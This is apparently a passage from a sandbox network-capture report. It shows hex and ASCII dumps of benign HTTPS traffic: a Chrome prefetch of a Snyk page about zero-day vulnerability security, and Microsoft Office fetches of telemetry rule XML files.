                                                                                                                                                                                                                                                                                                              Data Ascii: 00002B84":[{"sys":{"id":"7k5Qfnh6qJ95ke1AF9UZ8e","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":null,"spotlightFirstItem":false,"titleText":null,"submenuLinks":{"__typename":"NavigationDropdownMenuColumnRowItemsCollection","i
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              78192.168.2.54984023.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC689OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/zero-day-vulnerability-security.json?slug=solutions&slug=zero-day-vulnerability-security HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC655INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"yrdwmzfrjk47jq"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/zero-day-vulnerability-security.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::kf7nx-1729799349910-62d74309d33b
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799349.1f60f73
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC15729INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 42 4a 6f 74 71 58 54 69 6c 4e 7a 6f 58 47 50 5a 73 4f 35 67 30 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 30 2d 31 30 54 32 33 3a 32 32 3a 30 37 2e 34 36 32 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 38 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3BJotqXTilNzoXGPZsO5g0","type":"Entry","createdAt":"2023-10-10T23:22:07.462Z","updatedAt":"2024-07-18T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC15929INData Raw: 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 61 74 6f 6d 42 75 74 74 6f 6e 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 45 78 70 6c 6f 72 65 20 6f 75 72 20 43 75 73 74 6f 6d 65 72 20 56 61 6c 75 65 20 53 74 75 64 79 5c 22 20 2d 20 74 65 72 74 69 61 72 79 20 22 2c 22 6c 61 62 65 6c 22 3a 22 52 65 61 64 20 74 68 65 20 43 75 73 74 6f 6d 65 72 20 56 61 6c 75 65 20 53 74 75 64 79 22 2c 22 75 72 6c 22 3a 22 2f 72 65 70 6f 72 74 73 2f 63 75 73 74 6f 6d 65 72 2d 76 61 6c 75 65 2d 73 74 75 64 79 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 62 75 74 74 6f 6e 22 3a 7b 22
                                                                                                                                                                                                                                                                                                              Data Ascii: type":"Link","linkType":"ContentType","id":"atomButton"}},"locale":"en-US"},"fields":{"internalName":"\"Explore our Customer Value Study\" - tertiary ","label":"Read the Customer Value Study","url":"/reports/customer-value-study","appearance":{"button":{"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC16384INData Raw: 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 6a 74 61 59 5a 56 37 44 64 5a 61 51 36 61 76 62 36 78 31 55 72 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 30 2d 31 30 54 32 33 3a 32 32 3a 30 39 2e 31 34 35 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 38 54 32 31 3a 33 34 3a 30 36 2e 32 38 30 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22
                                                                                                                                                                                                                                                                                                              Data Ascii: :[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6jtaYZV7DdZaQ6avb6x1Ur","type":"Entry","createdAt":"2023-10-10T23:22:09.145Z","updatedAt":"2024-07-18T21:34:06.280Z","environment":{"sys":{"id":"master"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC1122INData Raw: 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 69 6e 6b 65 64 69 6e 2e 63 6f 6d 2f 70 6f 73 74 73 2f 64 61 6e 69 65 6c 73 74 65 6e 62 65 72 67 5f 63 75 72 6c 2d 61 63 74 69 76 69 74 79 2d 37 31 31 34 38 37 31 37 34 32 35 38 35 35 37 37 34 37 32 2d 34 4f 75 57 2f 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 6e 64 65 72 6c 69 6e 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 4c 69 6e 6b 65 64 49 6e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 79 70 65 72 6c 69 6e 6b 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73
                                                                                                                                                                                                                                                                                                              Data Ascii: nodeType":"text"},{"data":{"uri":"https://www.linkedin.com/posts/danielstenberg_curl-activity-7114871742585577472-4OuW/"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"LinkedIn","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 22 63 6f 64 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 63 75 72 6c 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 20 6d 61 69 6e 74 61 69 6e 65 72 73 20 68 61 76 65 20 62 65 65 6e 20 76 6f 63 61 6c 20 61 62 6f 75 74 20 64 6f 77 6e 70 6c 61 79 69 6e 67 20 74 68 65 20 72 69 73 6b 20 61 73 73 6f 63 69 61 74 65 64 20 77 69 74 68 20 6d 6f 73 74 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 69 65 73 20 72 65 70 6f 72 74 65 64 20 61 67 61 69 6e 73 74 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 63 6f 64 65 22 7d 5d 2c 22 76 61
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000"code"}],"value":"curl","nodeType":"text"},{"data":{},"marks":[],"value":" maintainers have been vocal about downplaying the risk associated with most vulnerabilities reported against ","nodeType":"text"},{"data":{},"marks":[{"type":"code"}],"va
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC12INData Raw: 22 53 70 61 63 65 22 2c 22 69 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: "Space","i
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 70 46 6f 34 6a 44 53 42 30 44 6d 4f 47 4f 63 76 4c 6f 48 77 31 56 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 30 39 2d 32 30 54 32 33 3a 31 39 3a 30 33 2e 35 38 39 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 30 2d 31 31 54 31 38 3a 32 34 3a 30 30 2e 38 34 32 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 33 30 2c 22 72 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000d":"oyrbri43adzz"}},"id":"pFo4jDSB0DmOGOcvLoHw1V","type":"Entry","createdAt":"2022-09-20T23:19:03.589Z","updatedAt":"2023-10-11T18:24:00.842Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":30,"re
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC12INData Raw: 45 6e 67 69 6e 65 20 75 73 65 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: Engine use
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC16384INData Raw: 30 30 30 31 38 30 30 30 0d 0a 64 20 66 6f 72 20 63 72 65 61 74 69 6e 67 20 32 44 20 61 6e 64 20 33 44 20 67 61 6d 65 73 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 6f 64 6f 74 65 6e 67 69 6e 65 2f 67 6f 64 6f 74 2f 63 6f 6d 6d 69 74 2f 32 35 32 39 61 64 36 61 36 34 32 37 61 32 37 66 34 37 63 31 65 66 38 63 65 32 61 61 63 36 30 38 66 36 63 32 30 65 64 38 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 6e 64 65 72 6c 69 6e 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 64 65 70 65 6e 64 73 20 6f 6e 20 74 68 65 20 6c 69 62 77 65 62 70 20 6c 69 62 72 61
                                                                                                                                                                                                                                                                                                              Data Ascii: 00018000d for creating 2D and 3D games ","nodeType":"text"},{"data":{"uri":"https://github.com/godotengine/godot/commit/2529ad6a6427a27f47c1ef8ce2aac608f6c20ed8"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"depends on the libwebp libra
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC16384INData Raw: 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 30 37 2d 31 39 54 31 38 3a 30 38 3a 32 39 2e 37 35 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 31 30 2d 30 32 54 31 35 3a 35 37 3a 35 35 2e 30 39 35 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 35 30 39 2c 22 72 65 76 69 73 69 6f 6e 22 3a 39 35 33 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79
                                                                                                                                                                                                                                                                                                              Data Ascii: ry","createdAt":"2022-07-19T18:08:29.757Z","updatedAt":"2024-10-02T15:57:55.095Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":1509,"revision":953,"contentType":{"sys":{"type":"Link","linkType":"ContentTy


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              79192.168.2.54983813.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: e1deb6d3-201e-006e-700b-22bbe3000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194910Z-16849878b78hz7zj8u0h2zng14000000086000000000r52g
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              80192.168.2.54984113.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 467
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 88497579-201e-0000-113a-26a537000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194910Z-r197bdfb6b4g24ztpxkw4umce800000000wg00000000ypba
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              81192.168.2.54983713.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 7aa3dd97-101e-005a-6a20-26882b000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194910Z-r197bdfb6b4cz6xrsdncwtgzd40000000qe000000000b663
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              82192.168.2.54983913.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:10 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 4755be7f-e01e-0052-062b-26d9df000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194910Z-16849878b78jfqwd1dsrhqg3aw00000008ag000000004m4g
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
